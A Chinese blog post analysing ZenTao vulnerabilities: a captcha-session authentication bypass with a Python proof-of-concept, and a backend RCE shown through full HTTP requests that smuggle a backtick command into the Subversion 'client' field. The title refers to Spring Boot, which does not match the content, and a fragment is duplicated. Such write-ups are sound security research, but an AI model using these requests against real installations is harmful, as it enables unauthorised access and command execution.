基于springboot架构项目的白盒审计经验分享

最新推荐文章于 2024-10-01 13:04:01 发布
最新推荐文章于 2024-10-01 13:04:01 发布
阅读量903 收藏 16
点赞数 8
文章标签: spring boot 架构 后端 测试工具 web安全 大数据 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HUANGXIN9898/article/details/139087293
版权

影响范围:
杭州易软共创网络科技有限公司 禅道项目管理系统 >=17.4,<=18.0.beta1(开源版)
杭州易软共创网络科技有限公司 禅道项目管理系统 >=7.4,<=8.0.beta1(企业版)
杭州易软共创网络科技有限公司 禅道项目管理系统 >=3.4,<=4.0.beta1(旗舰版)

漏洞分析

权限绕过

在misc的control层里,看到captcha方法通过sessionVar来设置session。
image.png

debug一下看看具体的操作

禅道对路径的解析
/index.php?m=misc&f=captcha&sessionVar=user

m表示module文件夹下的路由名字,也就是模型名字
f表示contorl里的函数,后面的参数就是指函数的参数

这里的session指的是
framework/base/router.class.php
可以看到,其set方法,将验证码的值赋值给user的session
image.png
怎么确定这就是设置用户的cookie呢

我们直接看到user的login的方法
module/user/model.php
image.png
是和验证码那块是一样的,因此用来伪造session

构造poc

import requests

header={
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5408.146 Safari/537.36',
        }

def bypasscookie(url,session):
    target=url+"/index.php?m=misc&f=captcha&sessionVar=user"
    r=session.get(target,headers=header)
    zentaosid=r.cookies.get_dict()['zentaosid']
    print(zentaosid)

    header["Cookie"]="zentaosid="+zentaosid
    resp=session.get(url+"/index.php?m=my&f=index",headers=header)
    if "/shandao/www/index.php?m=user&f=login" not in resp.text:
        print("绕过登陆验证")
    else:
        print("无法绕过验证")



if __name__ == '__main__':
    url="http://127.0.0.1:8081/shandao/www/"
    session=requests.Session()
    bypasscookie(url,session)

这个权限绕过实测中,比较鸡肋,原因是禅道管理系统在鉴权的时候,会获取user的属性值,其他版本应该可以用
image.png
虽然有了session,但是没法使用功能

后台rce

禅道系统提供了svn管理仓库
lib/scm/subversi
.class.php的getSVNVersion用到了exec方法
image.png看看这个方法在哪里引用了
发现在Subversion的构造方法里
image.png因此就需要找到调用构造方法的地方
发现lib/scm/scm.class.php的setEngine方法里是可以调用Subversion构造方法
image.png全局搜索发现有很多地方调用了setEngine
image.png这里以公开的payload来分析
在repo的model.php的update方法
调用了setEngine
image.png分析该方法发现,只要我们传过去的scm等于Subversion,并且传入的参数的path和查出来的path不相等,就可以进到setEngine方法里,在传过去参数里,data是我们post传过去的值,并且里面可以传client,之前的分析看到了exec执行client拼接后的命令,在使用update方法之前,需要先创建一个repo来获取repoID,在黑盒那边看见创建是调用了create方法

image.png

这里话不多说,只说关键部分,看到checkClient方法
image.png传过去的SCM不为GitLab,就没办法过checkClient方法的检查
所以第一步需要先创建Gitlab代码库,拿到repoID

POST /shandao/www/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8081/shandao/www/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 144
Origin: http://127.0.0.1:8081
Connection: close
Cookie: lang=zh-cn; device=desktop; theme=default; tab=devops; preCaseLibID=1; lastCaseLib=1; checkedItem=; goback=%7B%22devops%22%3A%22http%3A%5C%2F%5C%2F127.0.0.1%3A8081%5C%2Fshandao%5C%2Fwww%5C%2Findex.php%3Fm%3Drepo%26f%3Dbrowse%26repoID%3D1%26branchID%3D%26objectID%3D0%26tid%3Dvwy3ton6%22%7D; zentaosid=r3094u5448167shtdrur4c7b6q; repoBranch=master; windowWidth=1453; windowHeight=844
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

product%5B%5D=1&SCM=Gitlab&serviceProject=wangnima&name=wangnima2333&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=63e4a18218a68

image.png

创建好后,去到
http://127.0.0.1:8081/shandao/www/index.php?m=repo&f=maintain&tid=rmqcl0ss
查看repoID并进入编辑
image.png

POST /shandao/www/index.php?m=repo&f=edit&repoID=8&objectID=0&tid=rmqcl0ss HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8081/shandao/www/index.php?m=repo&f=edit&repoID=8&objectID=0&tid=rmqcl0ss
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 222
Origin: http://127.0.0.1:8081
Connection: close
Cookie: lang=zh-cn; device=desktop; theme=default; tab=devops; preCaseLibID=1; lastCaseLib=1; checkedItem=; goback=%7B%22devops%22%3A%22http%3A%5C%2F%5C%2F127.0.0.1%3A8081%5C%2Fshandao%5C%2Fwww%5C%2Findex.php%3Fm%3Drepo%26f%3Dbrowse%26repoID%3D1%26branchID%3D%26objectID%3D0%26tid%3Dvwy3ton6%22%7D; zentaosid=r3094u5448167shtdrur4c7b6q; repoBranch=master; windowWidth=1453; windowHeight=844
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

product%5B%5D=1&SCM=Subversion&serviceHost=&name=wangnima2333&path=http%3A%2F%2F123.4.5.6&encoding=utf-8&client=%60open+%2FSystem%2FApplications%2FCalculator.app%60&account=&password=&encrypt=base64&desc=&uid=63e4a26b5fd65

成功rce
image.png

s%2FCalculator.app%60&account=&password=&encrypt=base64&desc=&uid=63e4a26b5fd65
``

成功rce
[外链图片转存中…(img-0cBE7tmC-1716260505281)]

整个漏洞调用原理并不复杂,难的是怎么去找其中的逻辑,如何触发。

网络安全成长路线图

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:
在这里插入图片描述

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

​ 无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

在这里插入图片描述

程序员西西
关注
Java代码审计前置知识——SpringBoot基础
m0_61506558的博客
10-29 1155
(一)SpringBoot简介(一)SpringBoot简介1.1 回顾什么是SpringSpring是一个开源框架,2003 年兴起的一个轻量级的Java 开发框架,作者:Rod Johnson。1.2 Spring是如何简化Java开发的为了降低Java开发的复杂性,Spring采用了以下4种关键策略:1、基于POJO的轻量级和最小侵入性编程,所有东西都是bean;2、通过IOC,依赖注入(DI)和面向接口实现松耦合;3、基于切面(AOP)和惯例进行声明式编程;
基于springboot的电子商务系统设计与实现.docx
08-03
本文的电子商务系统设计与实现基于 Vue+SpringBoot 技术,使用 B/S 结构、 MySQL 数据库和黑盒测试白盒测试等技术,旨在提供一个高效、可靠、易用的电子商务平台。 * 主题:基于 SpringBoot 的电子商务系统设计与...
Spring Boot 中的审计
Candyz7的博客
08-20 1534
审计属性提供方便的注释,准备与 Spring Security 集成,也不能用于记录删除操作,因为它继承了 JPA 方法的相同缺陷。最后一个选择不需要接触我们的实体业务逻辑来添加跟踪逻辑,也不需要向实体添加额外的列或额外的表来记录更改。审计意味着跟踪和记录与数据相关的事务,这只是意味着记录插入、更新和删除操作用户和/或操作日期)。如果您使用的是 Spring,则可以使用无头解决方案来跟踪您的实体。使用实体的表本身来记录更改,在这种情况下我们无法审核删除操作。它登录到实体表以外的表,允许记录删除操作
php代码审计工作,PHP代码审计 | CN-SEC 中文网
weixin_31300697的博客
03-25 227
代码审计结合黑盒和白盒的方法。这里多数地方是先黑盒,发现问题之后,审计代码问题在哪以及如何解决。白盒包括使用自动化代码审计工具定位可控变量,进而逐个排查变量传入函数是否有安全问题。代码审计两个关键点:1、用户的输入都是不安全的2、能传入函数的变量都是危险的带着这两个点,进入这次学习之旅!在服务器搭建cms既然是黑白结合的方法,代码审计之前附上网站目录结构以及前后台。目录结构。大概是admin目录存...
使用SpringBoot进行数据库审计开发
AI天才研究院
01-28 518
1.背景介绍 1. 背景介绍 数据库审计是一种用于监控、记录和分析数据库活动的技术,以确保数据库的安全性、完整性和可用性。数据库审计可以帮助组织识别和防止潜在的安全威胁,以及监控数据库性能和使用情况。 Spring Boot是一个用于构建新型Spring应用程序的框架,它使得开发人员可以快速、轻松地开发和部署Spring应用程序。Spring Boot提供了许多功能,例如自动配置、开箱即用的...
白盒审计入门学习资料、讲解超详细
11-13
白盒审计,也被称为结构化审计或源代码审计,是一种软件安全评估方法,它涉及到对程序内部逻辑和源代码的详细审查,以发现潜在的安全漏洞和缺陷。这种审计方式允许评估者深入理解软件的工作原理,从而能更有效地定位...
基于SpringBoot新闻系统【Java项目论文】
04-25
### 基于SpringBoot新闻系统【Java项目论文】 #### 一、系统概述与研究背景 本系统旨在构建一个高效且实用的校园新闻网站,利用先进的Spring Boot框架结合Java语言进行开发,旨在满足校园内师生及管理者对于新闻...
基于SpringBoot非物质文化网站系统论文(Java项目
01-26
非物质文化网站设计与实现是一个基于SpringBootJava项目,旨在为用户提供深入了解和体验非物质文化遗产的平台。本论文通过六个章节详细介绍了项目的开发过程和技术要点。 首先,第一章详细阐述了项目开发的背景,...
基于Springboot的个人网站设计.docx
06-13
《基于Springboot的个人网站设计》是一篇关于利用Springboot架构建个人网站的详细文档,主要探讨了系统开发背景、开发环境与相关技术、需求分析、数据库设计、系统设计、系统实现以及系统测试等关键环节。...
SpringBoot学习笔记——AOP全局统一日志管理
12-21
一、前言 我们开发的Web系统都会有日志模块,用来记录对数据有进行变更的操作。一般都会记录请求的URL,请求的IP,执行的方法,操作人员等等。其目的可能是为了保留操作痕迹,防抵赖,或是记录系统运行情况,再有就是审计要求。 二、AOP 2.1 AOP是什么? 360百科:在软件业,AOP为Aspect Oriented Programming的缩写,意为:面向切面编程,通过预编译方式和运行期动态代理实现程序功能的统一维护的一种技术。AOP是OOP的延续,是软件开发中的一个热点,也是Spring框架中的一个重要内容,是函数式编程的一种衍生范型。利用AOP可以对业务逻辑的各个部分进行隔离,从而使得业
Java代码审计」华夏ERP3.0代码审计
橙留香Park的博客
09-22 3612
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ..
一个基于SpringBoot开发的RBAC系统,非常适合新手入门JavaWeb代码审计实战的系统,长文警告,要好好学习。
Power7089的博客
08-08 3165
一个基于SpringBoot开发的RBAC系统,非常适合新手入门JavaWeb代码审计的系统,长文警告,要好好学习哦。
代码审计——关键字总结
王嘟嘟的博客
10-19 792
0x00 前言 通过关键字来进行检索。 0x01 sql select from mysql_connect mysql_query mysql_fetch_row update insert delete 0x02 xss print print_r echo printf sprintf sprintf die var_dump var_export ...
Java项目实战II基于Java+Spring Boot+MySQL的免税商品优选购物商城(源码+数据库+文档)
2401_86524610的博客
09-30 1480
随着全球贸易的日益繁荣和消费者需求的多样化,免税商品购物已成为众多旅行者和消费者的热门选择。为了提供一个更加便捷、高效且优质的免税商品购物体验,我们精心打造了一款基于JavaSpring Boot和MySQL的免税商品优选购物商城系统。本系统充分利用Java语言的稳定性和Spring Boot框架的灵活性,结合MySQL数据库的高效存储能力,旨在为用户打造一个功能全面、操作简便的在线购物平台。通过系统的智能化推荐和详尽的商品信息展示,用户能够轻松浏览并选购心仪的免税商品,享受前所未有的购物乐趣。
Java项目实战II基于Java+Spring Boot+MySQL的智能物流管理系统(文档+源码+数据库)
2401_86524610的博客
09-29 570
随着电子商务的蓬勃发展,物流行业迎来了前所未有的挑战与机遇。传统物流管理方式在应对海量订单、复杂配送网络及实时追踪需求时显得力不从心。因此,开发一套基于Java+Spring Boot+MySQL的智能物流管理系统成为提升物流效率、优化客户体验的关键。本系统通过集成先进的信息技术,实现物流信息的自动化采集、智能分析、实时追踪与高效调度,旨在打造一个透明化、智能化的物流管理体系。
使用 Spring Boot 实现 JWT 生成与验证的自定义类
服务员的博客
09-29 957
JWT 的结构通常包含三个部分:头部(Header)、载体(Payload)和签名(Signature)。通过对这三个部分进行编码和加密,JWT 能够安全地传递用户信息。有效的 JWT 需要在客户端和服务器之间传递,因此确保它们的安全性是至关重要的。
足球青训俱乐部后台:Spring Boot开发策略
最新发布
2401_85761003的博客
10-01 614
采用B/S体系结构开发的应用软件仅仅需要在客户端安装谷歌浏览器或者其他浏览器就可以操作,对于维护和升级操作则在服务器端就能完成,不用在客户端进行操作,这样就节省了许多开销,B/S模式能够保证软件应用的跨平台性和通用性,采用它开发软件是最佳选择。数据库在整个系统中,就是这个系统的基础。系统结构设计是整个系统设计中重要的一部分,在结构设计过程中,首先对系统进行需求分析,然后进行系统初步设计,将系统功能模块细化,具体分析每一个功能模块具体应该首先哪些功能,最后将各个模块进行整合,实现系统结构的最终设计。
Java项目实战II基于Java+Spring Boot+MySQL的IT技术交流和分享平台的设计与实现(源码+数据库+文档)
2401_86524610的博客
09-26 1555
语言:Java使用框架:Spring Boot前端技术:JS、Vue 、css3开发工具:IDEA/Eclipse数据库:MySQL 5.7/8.0数据库管理工具:phpstudy/NavicatJDK版本:jdk1.8前端环境:Node.Js 12\14\16。
PHP白盒自动化审计技术探析与实践
在0x02实现思路中,作者分享了自己团队开发的自动化静态分析工具的实践经验。该工具首先遍历用户提供的工程目录,识别并专注于处理用户请求的Mainfile进行漏洞检测,而忽略如类定义或工具函数等非Mainfile类型文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值